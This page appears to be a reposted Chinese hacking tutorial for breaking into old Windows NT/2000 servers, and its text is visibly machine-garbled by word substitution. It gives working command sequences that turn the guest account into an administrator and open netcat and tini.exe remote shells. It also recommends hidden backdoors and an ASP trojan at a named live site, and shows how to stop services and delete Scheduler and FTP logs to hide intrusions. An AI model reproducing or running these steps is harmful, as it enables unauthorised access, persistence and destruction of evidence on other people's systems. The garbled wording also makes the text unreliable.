设为主页 | 加入收藏 | 繁體中文

几个小工具跟入侵方法

  要是你已经攫取了肯定的权限,比如,可写的!那么运用下面两个软件,可以方便的帮你入
  侵: DNTUCli.exe DNTUS26.exe
  在命令提示下运转:
  D:\>DNTUCli.exe
  Usage: DNTUCli.exe<\\server>
  DNTUCli.exe \\MachineName (remote server is \\MachineName)
  DNTUCli.exe \\. (local server) Copyright (C) 1991-2001 DameWare Development www.dameware.com
  当你输出ip的时候会让你输出用户和密码!只要对方开了ipc并且你的用户有可写的权限的
  话!! 就会复制统一目次下的DNTUS26.exe,这种步伐是本身安置并且本身翻开办事的!
  然后你就可以直接连接到对方的c了! 这种软件有CMD重定向功能··· 然后你就随便想
  做你的任何事情了!
  C:\>net user \\FYNET33 的用户帐户 ---------------------------------- Administrator Guest
  命令成功完成。 C:\>net user guest /active:yes
  命令成功完成。
  C:\>net user guest wry
  命令成功完成。 C:\>net user localgroup administrators guest /add
  命令成功完成。 这个时候你的guest已经是管理员了!!要是你克制了net.exe或者被删除了你可以用ftp
  命令下一个net.exe或者另外一个软件adduser.exe 用法: D:\>addusers.exe
  ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname]
  [/p:{l|c|e|d}]
  Error: too few arguments 如今你就是管理员了!要是感觉还不是很爽!呵呵!那么高兴进它的内部网络吧!!看:
  一,进入第一台假设平台的nt办事器通过简单的扫描器,只需带有简单密码验证的哪些就已足
  够扫出那些防备教差的呆板。 通常的用户名不是空就是相同。绑定netbeui协议的nt平台有个
  致命的弱点允许打击者得到本地用户名列表及接纳暴力法不断验证他们的密码 。 然后,就是
  因为网管在认识上的不器重,打击者几乎不需花很大的力气就能找到那些用户名和密码相同的
  或密码为空的办事器。
  二,打击者控制办事器文件系统
  有了密码对入侵者来说,绝对不是他们的最终目标!隐射为本土地,当入侵者得到你adminitra
  tor组的任何一个成员的密码,或者是个平凡用户的密码这里我把具体命令cut了!
  1,是administrator的成员时几乎可以隐射你恣意一个盘。
  2,平凡用户将使用种种大概的机会得到更多的信息或直接使用web hole来获取更大的权限。 典范的伎俩有:使用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞upload.
  asp)。
  注意:使用asp 功能,打击者异样能控制你硬盘上的大少数的文件(everyone的文件) 三,起动任何他们想要立即运转的步伐 一样平常来说立即启动对nt来说是比力困难的,固然有些入侵者会写几句命令,然后等候办事器
  重新启动时,他的步伐也将得以运转,但是我想对付大少数的打击者来说,他们不会有那么
  好的耐烦他们会立即启动他们的东西(大概是些后门木马)。
  在nt iis的web设置装备摆设里有个选项是实行--------伤害 打击者将使用他控制你文件系统的
  任何一种要领把他要启动的步伐放到那些允许实行的目次里去 然后他们将
  http://www.xxx.com/cgi-bin/xxx.exe
  使用web 启动该文件。
  指出:iis 默许的一些目次带有可实行的权益 /script/tools/ .... 对付一些低级入侵者来说,他们每每启动的是些后门木马,然后对付那些经验富厚的入
  侵者他大概对控制你一台呆板已经显得毫无兴味,他们大概真正的目标是控制你的整个
  网段,这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的
  东西 netcat ncx99.exe将在nt的99段口开启一个telnet办事端历程,等代打击者的
  登岸
  四,登岸获得最高权限 登岸后的入侵者在远端办事器并不具有最高的权限,他们将接纳一些nt本地溢出变成admin
  此中闻名的步伐是getadmin.exe 五,删除日志记载 任何一个入侵者都懂得保护他们本身!以是删除日志记载对他们来说是件很重要的事在这里
  我建议网管接纳第二硬备份或接纳第三方日志记载系统。 由于nt的日志文件是当前历程运转操作的文件,他是凭据时间来不断换新的操作文件的任何
  人,包罗admin在内是无权删除或更改的。
  而这里有个简单的不能在简单的原理,入侵者在获得admin权限后通过更改系统时间!让日
  志记载历程转而记载另一个文件,然后更改他想更改的谁人日志文件。 六,进入你的内部网 由于打击者登岸你的 shell ,此时的他所具有的ip 等同于你这台呆板上的内部地址 ftp 198.162.1.2 telnet 127.0.0.3 net view net use * \\
  都将在他们的手里变成入侵你内部网的东西,通过影射,然后在 cd z:
  同时上述的打击手段将再一次在内部网重演,扫描,破解,登岸。内部网络的速率将比长途
  快许多,这无意给入侵者暴力破解翻开了方便之门。 七,更多手段 大概话!他们会做一切你想不到的事!监听,ip欺骗。。。。。 但是,嗅探的要领是不大概在交换机的网络里抓到信息的!即使在内部网络里,我们的
  目标就是
  拿到对方的密码才可以有访问的权限! 要是你侥幸的有权限加到了域管理员!那么以上的都不要了! 我在把2000和nt下的后门拿出来说一下子: 怎样做个好后门是很要害的; 1》保举为小榕的RemoteNC,RemoteNC Beta 4 长途安置于NT/2000,提供CMD重定向功
  能因为它具有cmd的重定向,也就是挪用了对方的cmd,以是可以穿过放火墙背面的主机,传
  递信息但是必须要是administrator的身份安置 唯一的不好的,如今这个软件已经被参加了
  病毒的行列了!我紧缩了后,又被最新的kv3000杀去世了!
  2》如今保举为蓝色火焰,如今还没有被查杀了,支持ftp,telnet 等多种方法!
  既然你已经得到了管理员权限了! 那么复制到对方的admin4\system32改一个隐蔽的名字!!
  然后用at命令或者直接用 RemoteNC启动!,这个软件后门唯一不利益没有和exe联系关系! 很容
  易被删除的!
  3》保举为asp木马。这种木马永久不会被查杀!上传到对方主机有可实行的asp的目次下! 直接可以在欣赏器上直接运转的!
  比如http://www.fibrlink.com/flink/apply/cmdasp.asp 这个站点,我做的asp木马,到我写
  的时候,还是可以用的!希望各人只是用来测试!
  4》保举为tini.exe这个后门软件,据说是永久不会被查杀的软件,因为它用的是window的
  shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀去世的!复制到对方主机
  上,运转后就可以telnet对方的7777断口了! 怎样把本身的后门步伐隐藏的比力好? 1。取比力和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了! 2。用attrib隐藏文件了。但是这样只是外貌的隐藏! 3。运用一些生路的步伐,比如:Explorer.exe 一样平常的这个步伐都是在键值shell下的! 每次都会运转的!那么每次你的后门步伐都会启动! 4。隐藏在数据流里!(稍后介绍) 后门做好了,不要万事大吉了!还要删除了本身的记载! Windows2000的日志文件通常有使用步伐日志,宁静日志、系统日志、smtp办事器日志,DNS
  办事器日志、FTP日志、WWW日志等等大概会凭据办事器所开启的办事不同而有所不同。还有
  一些网络管理软件的日志,说到这里,记得新浪的网管软件是本身开辟的,要是不了解这个,
  大概会留下更多的记载!!! 1) Scheduler日志 Scheduler办事日志默许地位:2000下: %sys temroot%\schedlgu.txt NTworkstation
  下为 SchedLog.txt 可以翻开schedlgu.txt Schedluler办事日志在注册表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent 先停掉他 net stop "task scheduler" (注意不绝是删不掉的)
  然后再 del schedlgu.txt 或 schedlog.txt之后就OK了. del sched*.txt 不过你要是不想删他,也可以改改它. 他的内容是这样的: " "使命筹划步伐办事" 已退出于 01-5-22 20:37:34 "使命筹划步伐办事" 已启动于 01-5-25 7:07:37 "使命筹划步伐办事" 已启动于 01-5-25 7:26:36 "使命筹划步伐办事" 已退出于 01-5-25 8:47:54 " 很好改的. (2) FTP日志 Internet信息办事FTP日志默许地位:%sys temroot%\sys tem32\logfiles\msftpsvc1\
  ,默许每天一个日志.格式是这样的 ex*.log .注意这是一台NT4的LOGFILES下的文件:
  这台办事器下管理有多个HTTP或FTP站点 c:\winnt\sys tem32\logfiles 的目次 00-12-04 06:28p . 00-12-04 06:28p .. 01-05-18 12:56p MSFTPSVC1 01-04-23 11:28a MSFTPSVC2 01-01-12 11:56a MSFTPSVC3 01-06-01 08:12a SMTPSVC1 01-09-20 08:55a W3SVC1 01-08-02 10:36a W3SVC10 01-10-11 04:48p W3SVC11 01-07-11 09:16a W3SVC2 01-10-11 10:31a W3SVC3 01-10-10 04:55p W3SVC4 01-09-28 01:43p W3SVC5 01-10-11 08:44a W3SVC6 01-10-11 08:00a W3SVC7 01-09-30 01:49p W3SVC8 01-10-11 08:03a W3SVC9 看看日志文件的格式: c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log 192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8,
  0,0, 0,331, 0, [3]USER, anonymous, -, 192.168.5.8, -, 01-3-6, 16:41:51,
  MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0,530, 1326, [3]PASS, IE30User@, -,
  法一:> 这个时侯 net stop msftpsvc 停掉背景办事.
  然后尽管 del ............ 看这删吧,不要删的偏激,把当天的删了就行. 别忘了再NET
  START
  MSFTPSVC 把办事翻开.
  法二:> 固然你要是还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,
  别忘了把时间改返来哦 实际上在得到ADMIN权限后,做这些事很容易. 法三 最傻瓜的清FTP日志的要领, cleaniislog !!
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: